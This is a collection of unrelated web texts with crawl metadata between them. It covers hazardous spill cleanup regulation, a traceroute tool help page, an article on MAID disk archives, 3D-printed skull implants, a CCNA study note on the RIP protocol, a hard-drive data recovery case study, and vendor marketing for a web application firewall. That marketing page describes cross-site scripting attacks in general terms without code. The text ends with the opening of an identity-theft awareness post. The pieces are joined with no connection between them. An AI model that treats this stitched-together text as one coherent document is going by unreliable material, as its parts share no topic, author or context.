Hazardous material release incidents are regulated by the federal and state government under many environmental statutes, as well as worker protection statutes. The enforcement and oversight of the cleanup is usually delegated to the Designated Emergency Response Authority (DERA) for the spill. The DERA may be the state highway patrol, local fire department, sheriff, state health department or the United States Environmental Protection Agency (USEPA), depending upon the location and complexity.
Cleanup of uncontrolled release of hazardous substances are further regulated under OSHA. OSHA mandates that workers that provide these services are properly trained, are medically fit to wear respiratory protections and are properly equipped for and knowledgeable in the hazards present. Training requirements are specified in detail, as well as the site controls requirements.
Spills generally require complete removal of all contamination, regardless of quantity spilled. If complete removal is not reasonably feasible, risk-based cleanup standards may be sought through the regulators. It should be noted, however, that establishing and gaining approval for risk-based cleanup standards is typically very expensive, and often outweigh the cleanup costs of complex removal methods. After cleanup, demonstration of appropriate removal is required, normally through comprehensive sampling and laboratory analysis of the area of contamination.
Certain spilled materials are not directly regulated by environmental cleanup statutes or may be specifically regulated to allow “less than complete” removal. However, cleanup may be dictated by other statutes. Various statutes allow less than complete removal of hazardous substances that have been released. Common examples include petroleum products (RAC Guidelines) and Polychlorinated Biphenyl’s (PCBs, TSCA Guidelines). Beyond cleanup to satisfy regulatory requirements, many releases are being cleaned up to exceed these requirements simply to reduce potential liabilities regarding worker or personnel exposure. These substances may be cleaned up to other non-mandated standards to avoid these liabilities, such as the National Institute for Occupational Safety and Health (NIOSH) or American Conference of Governmental Industrial Hygenists (ACGIH) for indoor air quality. This is common in manufacturing facilities where “non-hazardous” substances may have been released within their plant and worker exposure to the substance may still be of concern.
Mitigation and Cleanup Measures
Released hazardous substances often destroy property and adversely affect the health of the people exposed. Wastes that are generated as a result of cleanup are quite costly to dispose, and typically carry a potential liability forever (known as Cradle to Grave Responsibility). Initial stabilization measures should be taken to protect those that may come in contact – to contain the material to reduce the spread of the release and to minimize the volume of materials that are polluted.
The first responder normally provides stabilization of a release. This may be the fire department, state patrol or a cleanup contractor. Initial efforts should attempt to control the release by closing valves, plugging leaks, etc. These measures are to be taken only by qualified personnel with suitable protection. Precipitation events, traffic and other means may mobilize spilled materials, which will increase the spill cleanup requirements and subsequent costs. Control efforts should be taken quickly to minimize the spread of material to lakes, waterways and other environmentally sensitive areas, as well as sewer systems, streams, open roadways, or other areas that will accelerate the spread of contamination. These efforts may include diking, plugging, overpacking, transferring, covering or through the use of containment booms like floating dikes.
Upon stabilization, or concurrent with stabilization, the spilled material and all affected areas must be cleaned up. These measures should be timely and may entail:
The costs to clean up hazardous material spills are significant, and lack of experience or proper equipment by the cleanup party can dramatically increase these costs. Determining specific cleanup measures should be a process that considers cost, method effectiveness and satisfaction of regulators and property owners. However, disposal costs of wastes generated, replacement value of damaged items, the cost of suspended service/lost business and other lagging or indirect costs should also be considered when determining cleanup strategies. Too often, these costs are not considered, and less expensive cleanup measures are taken that produce excessive waste disposal costs. In these situations, the final cost of the loss may be significantly greater than necessary.
Disposal of waste will be integral to or follow cleanup efforts and may take several months to arrange and schedule. Waste may be categorized as Hazardous, Industrial, Special, or exempt.
Special / Industrial Wastes
Mitigation and cleanup of spilled hazardous materials can be quite costly and, if not managed properly, can result in greatly elevated cleanup costs, increased liabilities and significant fines. Normally, time is of the essence and remains critical in stabilization of most spills – however, careful planning and selection of the best cleanup method is often more cost effective for the final cleanup. Costs and liabilities can be greatly reduced by understanding the fundamental elements that drive the cleanup effort and by managing these efforts with individuals who are qualified and possess direct experience with spill cleanup.
About the Author | <urn:uuid:5c566f4b-4e98-418d-8aa4-75c4a157b6f5> | CC-MAIN-2017-04 | http://www.disaster-resource.com/articles/08p_122.shtml | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00478-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.946581 | 1,760 | 2.875 | 3 |
Trace Route utility of OpUtils software records the route followed in the network between the senderís computer and a specific destination computer.
Click the Tools tab.
Choose Trace Route available under the Diagnostic Tools category.
Enter the IP Address/Host Name from which the route has to be traced.
Enter the Maximum Hops the packets should traverse before reaching the destination.
Enter the Timeout period in seconds, when the packet should be considered as expired and can be discarded.
To configure ICMP properties click Settings located in the top right corner or click Admin -> Settings. For details read the Configuring ICMP section.
Click the Trace button.
Check the results. The Trace Route results show the path that the TCP/IP packets take to reach a given destination, entered as an IP address or domain name. The results display the Number of routers/hops that the packets traverse before they reach the destination address/host, the IP Address, DNS Name and the Response Time taken for each hop. As three packets are sent for each hop, the response time taken for all the three hops are displayed in the result table. | <urn:uuid:8381e602-44bb-408e-b77f-d5301651585e> | CC-MAIN-2017-04 | https://www.manageengine.com/products/oputils/help/diagnostics/trace_route_tool.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00478-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.864963 | 231 | 2.578125 | 3 |
MAID, or massive array of idle disks, has the potential to make disk-based storage the archive technology of choice in the future. For now, though, IT managers are right to be somewhat skeptical.
MAID, or massive array of idle disks, has the potential to make disk-based storage the archive technology of choice in the future.
The selling point of MAID is that it delivers performance in the hard-drive-array class when data is requested yet reduces the amount of energy wasted when archive data is in idle mode . The reduction in power consumption and heat that the MAID model provides puts disk almost in the energy-efficiency class of tape.
MAID products are disk-based archives with unique capabilities that not only minimize power consumption but also prolong the lives of hard drives. The MAID concept has been around for a while, but there is currently only one company delivering live MAID solutions: Copan Systems.
As utility costs and the demand for rapid data access continue to rise, MAID could become even more compelling for long-term storage archiving.
At any given time, only about 25 percent of the disks in a MAID archive are active, with the other 75 percent in an idle state. A MAID system will consume about one-fourth to one-fifth the amount of power of a standard hard-drive-based archive, depending on how often data is accessed.
Click here to read more about MAID technology.
MAID naysayers often bring up the issue of stiction (static friction) when explaining why MAID is not currently widely used. Stiction is defined as a hard drive failure that occurs when the heads of a hard drive do not lift when platters are spun up. Stiction most often occurs when a hard drive is activated after a long period of inactivity.
Indeed, unlike tape, hard drives were not designed to sit idle for long periods of time. Copan therefore integrated automation programs in its MAID products that exercise the hard disks in an archive from time to time. Copans appropriately named Disk Aerobics technology periodically spins up idle disks and runs consistency checks to ensure that the data residing on the drives is valid.
Disk Aerobics is a novel concept, and it will likely help make sure stiction problems do not occur. However, MAID products are still in their infancy, so IT managers would be right to be somewhat doubtful about the expected life span of a MAID archive.
Copans MAID offerings, including the Revolution 220 family of products, use RAID 5 to ensure that data is protected, even if a drive happens to fail. eWEEK Labs assumes that RAID 6 could be implemented to provide dual parity, ensuring that data would not be lost even in the event that two drives in a given RAID set die simultaneously. When we spoke to Copan officials, however, they said they have no immediate plans to move to RAID 6 because their reliability record has been strong so far.
Copans first archive unit, released in August 2004, functioned as a VTL (virtual tape library), and the company has since added file-share-level access to its MAID archives. The smallest Copan system comes in at 28TB; priced at $3.75 per gigabyte, that makes it about $108,000.
Check out eWEEK.coms for the latest news, reviews and analysis on enterprise and small business storage hardware and software. | <urn:uuid:afde31f0-3e6a-4594-af2a-5997a59cafac> | CC-MAIN-2017-04 | http://www.eweek.com/c/a/Data-Storage/Storage-MAID-to-Order | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00322-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.955947 | 705 | 2.828125 | 3 |
As mentioned in a previous article, 3D printing is gaining popularity and it has now been approved for medicine. Doctors in some cases are able to replace 75% of patient’s skulls with 3D printing materials. Essentially you would take a scan of a patient’s skull and create a rendering in a CAD program. You could then set this to print out using the 3D printing products that would suit. This plastic material would then allow doctors to be able to X-ray through the replacement skull with ease. This is a relatively cutting edge procedure and Oxford Performance Materials is hoping to get other bone producing processes passed by the FDA. It’s a risk worth taking as each new bone manufacturing technique or type could net the company upwards of $100 million dollars. | <urn:uuid:e87bd516-9070-4940-ba15-fdffd75374c5> | CC-MAIN-2017-04 | http://www.bvainc.com/3d-printing-in-medicine-replacing-the-skull/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00534-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947886 | 156 | 2.75 | 3 |
In preparation of your CCNA exam, we want to make sure we cover the various concepts that we could see on your Cisco CCNA exam. So to assist you, below we will discuss one of the more difficult CCNA concepts; Routing Information Protocol (RIP). As you progress through your CCNA exam studies, I am sure with repetition you will find this topic becomes easier. So even though it may be a difficult concept and confusing at first, keep at it as no one said getting your Cisco certification would be easy!
RIP and RIP2: Routing Information Protocol
RIP (Routing Information Protocol) is a standard for exchange of routing information among gateways and hosts. RIP is most useful as an “interior gateway protocol”. In a nationwide network such as the current Internet, there are many routing protocols be used for the whole network. Rather, the network will be organized as a collection of “autonomous systems”. Each autonomous system will have its own routing technology, which may well be different for different autonomous systems. The routing protocol used within an autonomous system is referred to as an interior gateway protocol, or “IGP”. A separate protocol is used to interface among the autonomous systems. The earliest such protocol, still used in the Internet, is “EGP” (exterior gateway protocol). Such protocols are now usually referred to as inter-AS routing protocols. Routing Information Protocol (RIP) is designed to work with moderate-size networks using reasonably homogeneous technology. Thus it is suitable as an Interior Gateway Protocol (IGP) for many campuses and for regional networks using serial lines whose speeds do not vary widely. It is not intended for use in more complex environments.
RIP2 derives from RIP, which is an extension of the Routing Information Protocol (RIP) intended to expand the amount of useful information carried in the RIP messages and to add a measure of security. RIP2 is an UDP -based protocol.
RIP and RIP2 are for the IPv4 network while the RIPing is designed for the IPv6 network. In the document, only the details of RIP and RIP2 will be described.
Protocol Structure – RIP & and RIP2: Routing Information Protocol
- Command — The command field is used to specify the purpose of the datagram. There are five commands: Request, Response, Traceon (obsolete), Traceoff (Obsolete) and Reserved.
- Version — The RIP version number. The current version is 2.
- Address family identifier — Indicates what type of address is specified in this particular entry. This is used because RIP2 may carry routing information for several different protocols. The address family identifier for IP is 2.
- Route tag — Attribute assigned to a route which must be preserved and readvertised with a route. The route tag provides a method of separating internal RIP routes (routes for networks within the RIP routing domain) from external RIP routes, which may have been imported from an EGP or another IGP.
- IP address — The destination IP address.
- Subnet mask — Value applied to the IP address to yield the non-host portion of the address. If zero, then no subnet mask has been included for this entry.
- Next hop — Immediate next hop IP address to which packets to the destination specified by this route entry should be forwarded.
- Metric — Represents the total cost of getting a datagram from the host to that destination. This metric is the sum of the costs associated with the networks that would be traversed in getting to the destination.
I hope you found this article to be of use and it helps you prepare for your Cisco CCNA certification. Achieving your CCNA certification is much more than just memorizing Cisco exam material. It is having the real world knowledge to configure your Cisco equipment and be able to methodically troubleshoot Cisco issues. So I encourage you to continue in your studies for your CCNA exam certification. | <urn:uuid:9f648f0f-30a8-4f47-a30d-d3eb189c88bc> | CC-MAIN-2017-04 | https://www.certificationkits.com/rip-ccna/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00442-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.925165 | 821 | 3.71875 | 4 |
Contemporary hard drives use something called S.M.A.R.T. It stand for Self-Monitoring, Analysis and Reporting Technology, and its purpose is to predict hard drive failure and warn its user so data can be backed up elsewhere.
SMART is basically a record of several different hard drive performance metrics. Depending on the drive, the SMART table may show how long the drive has operated, how long it takes to boot, even its average operating temperature. The number of bad sectors that have developed over time are also recorded to the SMART table. You might think of a hard drive’s sectors as specific areas or addresses where data is kept.
If it takes multiple attempts to read Sector 10, for example, the drive’s operating system will copy the data to a different sector, and adjust the map of where data lives. When this happens, it’s recorded on the SMART table that another bad sector has developed. When the number of bad sectors exceeds the limit set in the SMART table, the user should get a warning that the hard drive is failing.
Relocating data to healthy sectors and keeping track of how many sectors are difficult or impossible to read prolongs the life of the drive and potentially affords some warning before a drive dies. These are both good things. But these generally helpful technologies can sometimes accelerate the hard drive’s demise when other things are going wrong.
Take the case of a bad read/write head. A read/write head is the tiny conductive loop. When it is reading data, the magnetized platter surface it flies over creates a digital electrical signal in the loop. When it is writing data, electrical impulses through the loop magnetize spots on the platter surface. If the head is not working properly, it does not reliably read data. When a read command fails due to a defective head, most hard drives will mistakenly assume that the sector it just to read is bad, even though the sector itself is good but it’s the head that is bad. So good sectors that the bad head can’t read are recorded as bad, and the hard drive tries to remap data in the growth defect list and increment the number of the bad sectors in the SMART tables. Here at Gillware we refer to real bad sectors as “hard” bad sectors, and sectors that are only reading as bad because of defective components as “soft” bad sectors.
The defective head will attempt to update the critical firmware area with all this new information. But, due to its failure, the head will be writing a bunch of gibberish to the hard drive’s operating system, which is bad. It’s corrupting the fundamental instructions that the hard drive relies on to operate and know where its data is.
That was the case with this drive, a 1 TB desktop Seagate Barracuda 7200.11 ST31000340AS with NTFS formatting. Its root problem was mechanical: a read/write head was malfunctioning. The SMART utility detected that it was getting read/write errors. It then tried to communicate with its firmware, but it did so with a malfunctioning read/write head. The result was a drive that became inoperable due to corrupted firmware and a bad read/write head.
To recover the data, we addressed both issues, and were able to get a 100 percent read of the files, and a 100 percent read of the master file table. Before paying, our client could see an entire directory of the recovered data in its original structure — file names, time stamps, file sizes. Our goal is to make it perfectly clear what’s been recovered. We only charge if, after reviewing the results, our client decides we succeeded.
Because addressing read/write heads is an internal repair, this case demanded clean room work and when it arrived at Gillware it was categorized as a Tier 2 recovery.
The hard drive belonged to a nonprofit, and was first taken to a local IT shop, which in turn brought it to us. This was the response we got from the shop:
Liberty Technical Solutions provides IT services, system management, remote support and consulting services for a number of clients in several states. In such a role we occasionally come across situations where a hard drive has failed with data that is critical to the operation of the client. In this instance a Non-Profit client was trying to put together a fundraising campaign and the drive containing all of their photos from past events failed. They rely entirely on contributions, grants and benefactors so not having the photos would have been catastrophic to their fundraising efforts.
Because of our prior relationship with Gillware we recommended them to the client, knowing that they would provide the best and fastest solution. Because of Gillware’s no risk service model the client would only pay if data could be recovered and all costs were explained up front. This way the client could find out if the data was recoverable before spending money to attempt recovery. This was vital in getting the sign-off to proceed.
As a result Gillware provided a quick response and within 2 days we had a listing of all recovered files and within another couple of days the client had all their data recovered and restored to their system at a very reasonable cost.
I’m pleased to recommend Gillware for their quick response, professionalism and reasonable prices. You can be assured we will use them again.
— Sherman Jones, Liberty Technical Solutions | <urn:uuid:71dfbfb8-5a87-41fc-a39f-f667c365ca6f> | CC-MAIN-2017-04 | https://www.gillware.com/blog/data-recovery/case-study-seagate-barracuda-7200-11-st31000340as-with-failed-heads-corrupted-firmware/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282202.61/warc/CC-MAIN-20170116095122-00074-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.96257 | 1,130 | 3.34375 | 3 |
Kerberos is a standard protocol that provides a means of authenticating entities on a network. It is based on a trusted third-party model. It involves shared secrets and uses symmetric key cryptography.
For more information, refer to RFC 1510.
Simple Authentication and Security Layer (SASL) provides an authentication abstraction layer to applications. It is a framework that authentication modules can be plugged into.
For more information, refer to RFC 2222.
Generic Security Services Application Program Interface (GSSAPI) provides authentication and other security services through a standard set of APIs. It supports different authentication mechanisms. Kerberos v5 is the most common.
For more information on the GSS APIs, refer to RFC 1964.
This SASL-GSSAPI implementation is from section 7.2 of RFC 2222. | <urn:uuid:2b2433d1-c152-4b41-b267-c69d03835396> | CC-MAIN-2017-04 | https://www.netiq.com/documentation/edir88/edir88/data/bs2zrb2.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00102-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.872331 | 171 | 2.859375 | 3 |
In nearly every research discipline, the number of scientific instruments available to add to the stream of data input has been climbing. While this has spurred any number of software developments in recent years, without adequate hardware processing capabilities to handle the delgue, there can be no match for the possibilities that lie in the incoming data.
Accordingly, a number of research institutions are findings new ways to handle the data deluge, both in terms of reinventing grid-based paradigms and looking to cloud computing models to extend already stretched computational resources.
Astronomy is one of several areas that is suffering from the glut of data brought about by more streamlined, complex, and numerous instruments and not surprisingly, researchers are looking to grid and cloud models to handle the well of data.
Researchers Nicholas Ball and David Schade discussed the concept of astroinformatics in detail, stating that, “in the past two decades, astronomy has gone from being starved for data to being flooded by it. This onslaught has now reached the stage where the exploitation of these data has become a named discipline in its own right…This naming follows in analogy from the already established fields of bio- and geoinformatics, which contain their own journals and funding.”
Canada’s astronomy community is, like other nations with advanced astronomy research programs, looking for ways to approach their big data problem in an innovative way that combines elements of both grid and cloud computing. Their efforts could reshape current views of astroinformatics processing and help the country move toward its goals of becoming a global center for advancements in astronomical research.
The Canadian Advanced Network for Astronomical Research (CANFAR) is behind an ongoing project in conjunction with CANARIE (a national research network organization) to create a cloud-based platform to support astronomy research. The effort is being led by researchers at the University of Victoria in British Columbia in conjunction with the Canadian Astronomy Data Centre (CADC) and with participation from 11 other Canadian universities.
The goal of the project is to “leverage customized virtual compute and storage clouds, providing astronomers with access to many datasets and resources previously constrained by their local hardware environment.”
The CANFAR platform will take advantage of CANARIE’s high-speed network and a number of open source and proprietary cloud and grid computing tools to allow the country’s astronomy researchers to better handle the vast datasets that are being generated by global observatories. It will also be propelled by the storage and compute capabilities from Compute Canada in addition to the expertise from the Herzberg Institute of Astrophysics and the National Research Council of Canada.
CANFAR is driven forward by a number of objectives to support its mission to create a “global machine” that will help researchers further their astronomy goals. The creators of the project stated, “All of the necessary components exist to support science but they don’t work well together in that mission. The type of service layer that is needed to support a high level of integration of these components for astronomy does not exist and needs to be invented, installed, and operated”
What CANFAR Can Do
The value proposition of CANFAR is that it will enable astronomers to process the data from astronomical surveys using a wide array of custom software packages and, of course, to widen the set of computational resources available for these purposes.
A report on the project described CANFAR as “an operational system for the delivery, processing, storage, analysis, and distribution of very large astronomical datasets” and as a project that pulls together a number of Canadian entities, including the Canadian National Research Network (CANARIE), Compute Canada’s extensive grid and storage capabilities, and the CADC data center to create a “unified storage and processing system.”
The report also describes the CANFAR project’s technical details, stating that it has “combined the best features of the grid and cloud processing models by providing a self-configuring virtual cluster deployed on multiple cloud clusters” that takes elements from grid-based services as well as a number of cloud services, including “Condor, Nimbus or OpenNebula, Eucalyptus or Amazon EC2, Xen, VOSpace, UWS, SSO, CDP and GMS.”
The researchers behind the CANFAR project noted that when considering different virtualization options, they considered both Xen and KVM, but settled on Xen because of its wider popularity at the time and because it was the only one that facility operators had used on an experimental basis in the past.
On the scheduler front, there were complexities because the CANFAR virtual cluster needed a batch job processing system that would provide the functionality of a grid cluster, thus making both Grid Engine and Condor natural options. The team settled on Condor, however, because upon examination of the environment, they found that using Grid Engine would mean that they would have to modify the cluster configuration anytime a VM was added or removed.
The team selected Nimbus as the “glue between cloud clusters” which “examined the workload in the Condor queue and used resources from multiple cloud clusters to create a virtual cluster suitable for the current workload” and used the Nimbus toolkit as the primary cloud technology behind the cloud scheduler.
The team also developed support for openNebula, Eucalyptus and Ec2, but decided on Nimbus because it was open source and permitted the “cloud workload to be intermixed with conventional batch jobs unlike other systems. “ The research team behind CANFAR stated that they believed “that this flexibility makes the deployment more attractive to facility operators.”
With Linux as the operating system and an emphasis on interoperability and open source, CANFAR will be a proving ground for the use of these scheduling and cloud-based management tools on large datasets. In addition to other projects that make use of similar (although diverse in terms of packages used) interoperability and open source paradigms like NASA’s Nebula cloud, there will likely be a number of exciting proof of concept reports that will emerge over the course of the next year.
CANARIE’s vision for the project is that it will also “provide astronomers with novel and more immediate hands-on and interactive ways to process and share very large amounts of data emerging from space exploration.”
In addition to helping research better manage the incredible amounts of data filtering in from collection sites, the project’s goals are also tied to aiding collaboration opportunities among geographically dispersed scientists.
As the CANFAR team noted, “a schematic of contemporary astronomy research shows that the system is essentially a networked global array of infrastructure with scientists and telescopes as I/O devices.”
Slides describing some of the current research challenges and potential benefits as well as some of the context for the project can be found here. | <urn:uuid:aee521a7-1381-45ba-9580-cb98185e7117> | CC-MAIN-2017-04 | https://www.hpcwire.com/2011/01/17/canada_explores_new_frontiers_in_astroinformatics/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00404-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942952 | 1,439 | 2.875 | 3 |
Every medium has its pros and cons when it comes to conveying a message. One of the most used communication methods today, e-mail, has almost replaced face-to-face communication – even for people in the same office.
E-mail certainly has a place in business communications, but it sure isn’t perfect, especially when it comes to understanding a person’s tone of voice, which is critical in forging personal connections. Ever get an e-mail from your manager or an employee and wonder what emotion the sender was feeling? How often do multiple messages get exchanged until understanding is achieved? It happens all the time!
A phenomenon that has exploded with the growth of social media and texting is the emoji, a small, digital icon used to display an idea or emotion. Emojis typically are derived from a smiley face, for good reason. Human beings recognize emotions in facial expressions. Before emojis became popular, there were emoticons, which use punctuation marks rather than icons, but the idea is the same: they provide a way to signal emotions. ; ) For a lot of people sending texts and e-mail, the icons are added on a reflexive impulse, to emphasize the intended emotion of the message. That’s a pretty good sign that the words alone aren’t enough.
Why aren’t words enough? Because the tone of your words matters. When you communicate with somebody who has difficulty understanding your tone of voice, the message itself tends to get lost or misinterpreted. To reach and engage an audience, whether it’s one person or 10,000, messages need to be clear and create an emotional connection.
Tim Sanders, former chief solutions officer and leadership coach at Yahoo and now a strategy consultant, offers great advice on what to do when e-mail falls short of delivering the intended message: pick up the phone and talk to whomever you’re trying to reach. What a novel idea! Let your audience hear your voice and clear up any misconceptions. But one thing you can’t convey on a phone call is body language. So there is still room for miscommunication, even when people are listening to what you’re saying.
What method of communication is personal and conveys emotion directly and unambiguously? It’s face to face. This can be delivered in person, but it is equally effective when communicating via video. When you can see and hear the person speaking, and observe his or her facial expressions and body language, you have a very clear idea of that person’s intended message.
For enterprises with large, distributed audiences – they can be employees, customers, business partners or others – the most cost-effective way to communicate clearly, the first time and every time, is through live or on-demand video.
I’ve written before about the power of authenticity in communication, and it’s been proven time and again with clients of my company, INXPO, that live video is the most authentic form of mass communication, next to being there in person.
To learn more about the power of live events powered by video, visit www.inxpo.com. | <urn:uuid:3f791fd2-c954-44bb-966f-681c0e437a19> | CC-MAIN-2017-04 | https://blog.inxpo.com/why-emotion-matters-in-messaging/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279176.20/warc/CC-MAIN-20170116095119-00159-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.944174 | 656 | 2.640625 | 3 |
Cross-site scripting has been at the top of both the OWASP Top Ten list and the CWE/SANS Top 25 repeatedly. Some reports show cross-site scripting, or XSS, vulnerabilities to be present in 7 out of 10 web sites while others report that up to 90 percent of all web sites are vulnerable to this type of attack. Why are so many sites at risk? Because cross-site scripting attacks are so easy to perform.
Basically, an attacker inputs a malicious script into a web site. This can be in a forum, comment section, or any other input area. When victims visit that web site, they only need to click on that script to start the exploit.
A few facts about cross-site scripting attacks that you should be aware of are:
Attackers are lured to XSS exploits because how easy they are to perform, but they also know to follow the money. Attacking a web site through a cross-site scripting vulnerability can be quite profitable for the attacker who knows how to harness this type of exploit.
Without proactive Web application security in place to stop XSS attacks, you leave your site vulnerable to:
Web sites that have been exploited using XSS attacks have also been used to:
With dotDefender web application firewall you can avoid XSS attacks because dotDefender inspects your HTTP traffic and determines if your web site suffers from cross-site scripting vulnerabilities or other attacks to stop web applications from being exploited.
Architected as plug & play software, dotDefender provides optimal out-of-the-box protection against cross-site scripting, SQL Injection attacks, path traversal and many other web attack techniques.
The reasons dotDefender offers such a comprehensive solution to your web application security needs are:
Before a web site can be compromised, an attacker needs to find applications that are vulnerable to XSS vulnerabilities. Unfortunately, most web applications, both Free/Open Source Software and commercial software, are susceptible. Attackers simply perform a Google search for terms that are often found in the software. Using search bots to automate this process means an attacker can find thousands of vulnerable web sites in minutes.
Once a vulnerable web site is discovered, the attacker then examines the HTML to find where the exploit code can be injected.
After this has been determined, the attacker then begins to code the exploit. There are three types of attacks that can be used:
After the code has been written, it is then injected into the target site.
Now that the script has been injected into the vulnerable site, the attacker can now begin to reap the rewards. If the intent of the XSS attack was to steal user authentication credentials, usernames and passwords are now collected. For attacks that center around keystroke logging, the attacker will begin to receive the logged results from the victims. If the intent was to inject spam links into a well trusted site, then the attacker will begin to see increased activity on their sites due to higher traffic and higher search engine results.
If the attack was successful, the attacker will often replicate it on other sites to increase the potential reward.
Cross-site scripting not only costs businesses in stolen data, but also by harming their reputation. Owners who work hard to build themselves as trusted site to deliver content, services, or products often find themselves hurt when loyal visitors lose trust in them after an attack. Visitors whose data is stolen or find their computers infected as the result of an innocent visit to your web site are hesitant to return even if assurances are made that the site is now clean.
Even if a vulnerable site is fixed, sites that contained malicious code from an XSS exploit are usually flagged by Google and other search engines as a result. Resources spent in time and effort to restore a solid reputation with the search engines is an added cost that most web site owners never figure on.
The threat posed by cross-site scripting attacks is not solitary. Combined with other vulnerabilities like SQL injections, path traversal, denial of service attacks, and buffer overflows the need for web site owners and administrators to be vigilant is not only important but overwhelming.
dotDefender's unique security approach eliminates the need to learn the specific threats that exist on each web application. The software that runs dotDefender focuses on analyzing the request and the impact it has on the application. Effective web application security is based on three powerful web application security engines: Pattern Recognition, Session Protection and Signature Knowledgebase.
The Pattern Recognition web application security engine employed by dotDefender effectively protects against malicious behavior such as SQL Injection and Cross Site Scripting. The patterns are regular expression-based and designed to efficiently and accurately identify a wide array of application-level attack methods. As a result, dotDefender is characterized by an extremely low false positive rate.
What sets dotDefender apart is that it offers comprehensive protection against cross-site scripting and other attacks while being one of the easiest solutions to use.
In just 10 clicks, a web administrator with no security training can have dotDefender up and running. Its predefined rule set offers out-of-the box protection that can be easily managed through a browser-based interface with virtually no impact on your server or web site’s performance. | <urn:uuid:58779578-27dc-4473-82a9-b75ce69e7b39> | CC-MAIN-2017-04 | http://www.applicure.com/solutions/prevent-cross-site-scripting-attacks | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279224.13/warc/CC-MAIN-20170116095119-00003-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940567 | 1,073 | 2.8125 | 3 |
SQL declares a cursor implicitly for all SQL data manipulation statements, including quries that return only one row. However,queries that return more than one row you must declare an explicit cursor or use a cursor FOR loop.
Explicit cursor is a cursor in which the cursor name is explicitly assigned to a SELECT statement via the CURSOR...IS statement. An implicit cursor is used for all SQL statements Declare, Open, Fetch, Close. An explicit cursors are used to process multirow SELECT statements An implicit cursor is used to process INSERT, UPDATE, DELETE and single row SELECT. .INTO statements | <urn:uuid:8d1f3fba-a29a-4831-8e9f-9cbea8122f3e> | CC-MAIN-2017-04 | http://ibmmainframes.com/about24962.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281084.84/warc/CC-MAIN-20170116095121-00213-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.780855 | 128 | 2.8125 | 3 |
Generally, DNS represents to Domain Name System. But sometimes it is referred to Domain Name Service too. Anyhow, DNS system is a multi-level distributed naming system for whether computers, services, or any other resource, connected to the internet or else a private network. The main purpose of this system is to join together relevant information and domain names that are allotted to online participating entities. Most importantly, it gives meaningful form to domain names for the purposes of identifying networking equipments which are located on the different corners of the world. The DNS can spell out the function, practically of a database service. It can also define the DNS protocol, detailed specifications of the data structures and communication exchanges used in DNS as part of the IP suite.
But as an internet service, the key job of DNS is to transform the domain names of communicating devices into their IP addresses. With this system, it is possible to allocate domain names to different groups of the online resources plus users, independent of their (devices) physical locations. The reason of doing so is just to provide the convenience of understanding devices names over the internet. Domain names are available in the form of alphabetic so one can easily understand and even remember them since IP addresses are assigned to connected devices in the numerical form such as 22.214.171.124.
Whenever you will visit a website that means you are going to use a domain name. Therefore, only a domain name system can translate addressed domain name into its corresponding Internet protocol or IP address.
Certain advantages are associated with the DNS service like:
- no host table management is required
- especially designed for the internet and internet existence will be impossible without DNS system
The Domain Name System provides a hierarchical structure either it is a matter of delegating naming authorities or maintaining the naming structure within DNS. But at the uppermost level of that hierarchy, you will observe the root domain “.” which is under the control of the IANA (Internet Assigned Numbers Authority). Moreover, root domain administration authority is given to IANA so beneath root, domains allocation can be made.
The course of handing over a domain to any organizational body is known as delegating. That is also involved creating sub-domains by administrator of that domain etc. But a hierarchical delegation inaugurates at the DNS “root” while a fully qualified domain name, is acquired after writing simple names (attained as a result of tracing DNS hierarchy and sorting out each one name with a “.”) For example: oma.xyz.edu.au
The DNS maintenance is done by a distributed database that follows a client/server approach. But connecting nodes with a database are known as name-servers. But an “authoritative name server” mechanism is used to make the DNS both distributed and fault-tolerant system. There should be as a minimum one authoritative DNS server in every domain so that can distribute information regarding this domain as well as about the name-servers of any other domain, assisting to this domain. Authoritative name server is itself a name-server but that has an authority to provide configured (specified by the administrator) answers. There are two types of an authoritative name server:
- master server with original zone records copies
- slave server
Domain names will be registered with the help of domain name registrar. The duty of a primary name server is required while installing domain name at top level domain registry. And in any case, one secondary name server is also needed. Primary name server is called master name server and secondary name server is work as a slave server. | <urn:uuid:26a199ab-078b-4bdc-bd94-d5b7b4e8d4f7> | CC-MAIN-2017-04 | https://howdoesinternetwork.com/2011/dns | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281162.88/warc/CC-MAIN-20170116095121-00057-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.919037 | 735 | 3.75 | 4 |
December is Identity Theft Prevention and Awareness month. Amidst all the bells-a-ringing and people singing that also come around this time of year, it can be easy to ignore the more sober reality of this important topic.
Are You Aware?
A great place to start on the “awareness” side of all this is with Norton Security’s 2011 cybercrime report: a sleek, user-friendly chart with surveys, maps, and even animations breaking down everything you need to know about the current state of cybercrime in the U.S. Some of the statistics are pretty grim, but eye-opening. Here are some numbers you really need to see:
- Last year, in 24 countries, 14 people suffered from cybercrime every second
- Altogether cybercrime cost victims (in those same countries) $113,882,054,117
- The odds an online adult will become a victim of cybercrime this year is almost 1 in 2
